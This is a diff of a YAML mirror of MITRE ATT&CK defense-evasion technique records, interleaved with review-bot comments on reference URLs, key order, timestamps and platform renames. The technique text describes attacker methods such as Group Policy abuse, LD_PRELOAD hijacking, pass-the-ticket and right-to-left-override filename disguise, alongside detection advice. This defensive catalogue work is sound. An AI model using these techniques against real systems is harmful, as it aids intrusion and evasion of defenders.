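Review bot: only two of the four Microsoft references are refreshed. `Microsoft CreateProcess` and `Microsoft WinExec` now point at learn.microsoft.com with a 2024 retrieval date, while `Microsoft Environment Property` and `Windows NT Command Shell` keep `docs.microsoft.com/en-us/previous-versions//...` URLs (note the double slash) with 2016 and 2014 retrieval dates. If this mirrors the upstream bundle verbatim, leave it; if the references are curated here, refresh the other two for consistency. The reordering of the whole `external_references` list makes the hunk look larger than the real change; a stable sort key in the generator would keep these diffs reviewable.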
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
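Review bot: the two harmj0y references move from `http://www.harmj0y.net/blog/...` to `https://blog.harmj0y.net/...`, which drops plain HTTP and follows the blog's current host, and their retrieval dates are updated to match. The `TechNet Group Policy Basics` entry in the same block still carries a March 2019 retrieval date and a `blogs.technet.microsoft.com` URL; it was not re-checked in this pass and should be the next one verified, since that host has been migrated.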
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
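Review bot: in the context lines the description has `CreateProcessWithTokenW` and `runas` each sitting alone on a line, followed by a line starting with `.(Citation: Microsoft RunAs)`. That looks like inline-code markup stripped on import, leaving hard line breaks inside a `|-` block scalar; the hunk only changes `modified`, so this is pre-existing, but if the generator is being touched anyway it is worth preserving the code spans (or at least joining the sentence) so the rendered description does not read as three fragments. The same pattern shows up in the T1578.003 and T1036.002 descriptions below.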
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
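Review bot: on its own this hunk removes `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list from T1578.003 and keeps only `name` and `description`, which would leave an invalid technique object; it is only coherent together with the next hunk, which re-adds those keys at the end of the block. Please review the two as a pair, and consider a fixed key order in the generator so a metadata refresh does not present as a full rewrite of the object.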
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
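Review bot: once the reorder is factored out, the real changes to T1578.003 are small and should be called out: the Mandiant M-Trends URL moves from `content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` (the old host is no longer the canonical one), `x_mitre_permissions_required: User` is dropped, `x_mitre_contributors` gains `Arun Seelagan, CISA`, `revoked: false` and `x_mitre_deprecated: false` are added, and `x_mitre_version` goes 1.1 to 1.2. Confirm the `x_mitre_permissions_required` removal is intentional rather than lost in the reorder, since no other hunk in this patch removes that field from a block that still carries it.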
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
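Review bot: the context lines carry a citation whose retrieval date precedes its publication date: `Stefan Kanthak. (2015, December 8). ... Retrieved December 4, 2014.` The hunk itself only changes `modified` (and moves it backward, from 2020-10-27 to 2020-03-26, the same pattern as elsewhere in this patch), so the bad date is pre-existing; it is not something to hand-edit in this file, but it should be reported where the reference data is maintained.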
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
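Review bot: the new description scalar ends with a trailing space before the closing quote (`or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), so the string value now carries a trailing blank that will survive into anything rendered from it; if this file mirrors the upstream STIX bundle verbatim that is an upstream artifact, otherwise strip it in the generator. The rest of the hunk (expanded description, new contributor `Arun Seelagan, CISA`) reads as a content revision, and the matching `x_mitre_version` bump to 1.3 is in the next hunk.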
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
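Review bot: `spec_version: '2.1'` is dropped here, and in the same way for most objects in this patch, while `x_mitre_attack_spec_version` is bumped to 3.2.0. `spec_version` is the STIX 2.1 object-level property, so any consumer that validates these technique records as STIX objects will now see it missing; confirm the removal is intentional (for example because the generator now carries it once at bundle level) and say so in the PR description rather than leaving it implicit in a long run of one-line deletions.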
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
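Review bot: the `modified` timestamp moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-10-14T21:01:59.733Z`. The old values throughout this patch share the `14:00:00.188Z` time component, which looks like a release-wide stamp, while the new ones are per-object timestamps; that change of source should be documented, because anything that sorts or diffs techniques by `modified` will see many objects appear to get older in this update.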
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
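Review bot: here `x_mitre_attack_spec_version: 2.1.0` is removed outright rather than bumped as it was for T1562.007 two hunks earlier. If the upstream object for T1036.002 genuinely has no `x_mitre_attack_spec_version` (older objects that have not been re-modified), that is expected, but consumers reading the key will now get a missing field for some techniques and a value for others; reading it with a default, and a note in the PR description, would avoid surprises.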
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
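Review bot: the platform list drops `Office 365` and `Google Workspace` in favour of `Office Suite`, alongside the `x_mitre_version` bump from 2.1 to 2.2. Any per-platform index or filter keyed on the old platform strings will no longer match T1070, so those derived artifacts need regenerating in the same change; it is also worth checking that every other technique in this file that carried the two old platform names received the same rename, otherwise the platform vocabulary ends up mixed.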
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
